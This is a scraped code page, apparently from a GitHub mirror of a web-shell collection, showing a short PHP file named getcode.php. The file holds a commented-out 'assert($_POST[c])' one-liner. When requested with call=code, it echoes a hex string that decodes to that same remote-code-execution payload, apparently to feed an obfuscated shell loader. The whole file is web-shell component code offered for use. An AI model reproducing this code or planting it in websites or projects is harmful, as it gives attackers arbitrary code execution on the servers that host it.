mirror of
https://github.com/tennc/webshell
synced 2025-02-16 09:48:24 +00:00
7 lines
145 B
PHP
7 lines
145 B
PHP
<?php
|
|
//getcode.php
|
|
//assert($_POST[c]);
|
|
$cmd=$_GET['call'];
|
|
if ($cmd=='code')
|
|
echo sprintf('61737365727428245f504f53545b635d293b');
|
|
?>
|